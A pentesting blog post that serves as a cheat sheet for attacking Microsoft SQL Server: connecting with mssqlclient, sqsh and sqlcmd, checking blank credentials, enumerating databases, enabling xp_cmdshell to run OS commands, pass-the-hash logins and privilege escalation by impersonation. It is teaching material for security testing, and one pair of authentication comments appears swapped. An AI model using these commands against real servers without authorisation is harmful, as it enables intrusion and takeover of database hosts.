Post

Microsoft SQL Server: 101

Hands-on Microsoft SQL Server exploitation guide for pentesters, including service detection, authentication, database enumeration, command execution, and privilege escalation.

Posted
Netowrk Penetration Testing Guide Cover Image
Netowrk Penetration Testing Guide Cover Image
By bericontraster
2 min read
Microsoft SQL Server: 101

What is MSSQL? Default Port: 1433

Microsoft SQL Server (MSSQL) is a proprietary relational database management system (RDBMS) developed by Microsoft, designed to store, retrieve, and manage structured data. It uses Transact-SQL (T-SQL), a proprietary SQL variant, to handle transactional processing, business intelligence, and analytics applications across corporate environments.

Connect

MSSQLCLIENT

1
2
3
4
5
6
7
8
9
10
11

# Windows authentication
mssqlclient.py DOMAIN/username:password@target.com

# SQL authentication
mssqlclient.py sa:password@target.com -windows-auth

# With specific database
mssqlclient.py username:password@target.com -db master

# Using hash (Pass-the-Hash)
mssqlclient.py username@target.com -hashes :NTHASH

SQSH

1
2
3
4
5

# Connect with SQL authentication
sqsh -S target.com -U sa -P password

# Connect with Windows authentication
sqsh -S target.com -U DOMAIN\\username -P password

SQLCMD (WINDOWS)

1
2
3
4
5
6
7
8
9
10
11

# Local connection
sqlcmd -S localhost -U sa -P password

# Remote connection
sqlcmd -S target.com,1433 -U sa -P password

# Windows authentication
sqlcmd -S target.com -E

# Execute query directly
sqlcmd -S target.com -U sa -P password -Q "SELECT @@version"

Reconnaissance

Service Detection (NMAP)

Using nmap to detect running MSSQL services.

1

nmap -p 1433 target.com

Credential Vertification

1
2
3
4
5

# With Local Auth
nxc mssql $IP -u '' -p '' --local-auth

## Without Local Auth
nxc mssql $IP -u '' -p ''

Enumeration

Version Detection

1
2
3
4
5
6
7
8
9
10
11

# Get SQL Server version
SELECT @@version;

# Get product version
SELECT SERVERPROPERTY('ProductVersion');
SELECT SERVERPROPERTY('ProductLevel');
SELECT SERVERPROPERTY('Edition');

# Get machine name
SELECT @@SERVERNAME;
SELECT SERVERPROPERTY('MachineName');

Database Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13

# List all databases
SELECT name FROM sys.databases;
SELECT name FROM master.dbo.sysdatabases;

# Current database
SELECT DB_NAME();

# Database information
SELECT name, database_id, create_date 
FROM sys.databases;

# Database size
EXEC sp_helpdb;

MSSQCLIENT (COMMANDS)

XP_CMDSHELL

1
2
3
4
5

# Enable XP_CMDSHELL
enable_xp_cmdshell

# Enumerate
xp_cmdshell whoami

Enumerate

1
2
3
4
5
6
7
8
9
10

enum_db;
enum_users;
enum_logins;
enum_links;
enum_impersonate;

# Interact
use x_database;
SELECT name FROM sysobjects WHERE xtype='U';
select * from tablename;

Impersonate

1
2

enum_impersonate;
exec_as_login username;

Privilege Escalation

NXC

Detect which user can be impersonated for privilege escalation with NXC. Use -M to view all modules.

1

nxc mssql $IP -u '' -p '' --local-auth -M mssql_priv
pentesting
guide pentesting exploitation privilege-escalation
This post is licensed under CC BY 4.0 by the author.